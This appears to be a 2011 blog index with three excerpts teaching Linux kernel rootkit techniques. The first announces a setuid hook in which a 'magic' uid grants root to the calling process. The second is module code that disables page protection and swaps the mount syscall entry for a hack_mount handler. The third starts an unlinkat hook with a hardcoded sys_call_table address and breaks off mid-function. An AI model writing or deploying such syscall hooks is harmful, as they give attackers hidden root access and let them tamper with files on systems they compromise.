Mar 23, 2011

Kernel Mode Testing Plann

--[ 0x01 Introduction

    In this article I will show you the basic technique that rootkits use
    to hook system calls in kernel mode. I will deal only with Linux 2.6
    on x86-32 and x86-64. In the end we are going to hook the setuid system
    call so that, when it receives a "magic" uid as its argument, it gives
    root to the calling process.


Mar 21, 2011

Credintealist

/* Module entry point: swap the mount handler in the syscall table
 * for our own hack_mount, keeping the original pointer so it can be
 * restored in cleanup_module(). */
int init_module(void)
{
    disable_page_protection();                 /* make the table writable */
    ori_mount = sys_call_table[__NR_mount];    /* save the real handler */
    sys_call_table[__NR_mount] = hack_mount;   /* install the hook */
    enable_page_protection();                  /* re-protect the page */
    return 0;
}

Mar 16, 2011

Redemption

#include <linux/module.h>
#include <linux/kernel.h>

/* Filenames containing this substring are the ones the hook acts on. */
char *pattern = "michaless";

/* Address of sys_call_table for this specific kernel build (taken from
 * System.map); it changes from kernel to kernel. */
void **sys_call_table = (void *)0xc1958140;

/* Pointer to the original unlinkat handler, saved before hooking. */
asmlinkage int (*ori_unlinkat)(int dirfd, char *pathname, int flags);

/* Replacement unlinkat handler installed in sys_call_table. */
asmlinkage int hack_unlinkat(int dirfd, char *pathname, int flags)
{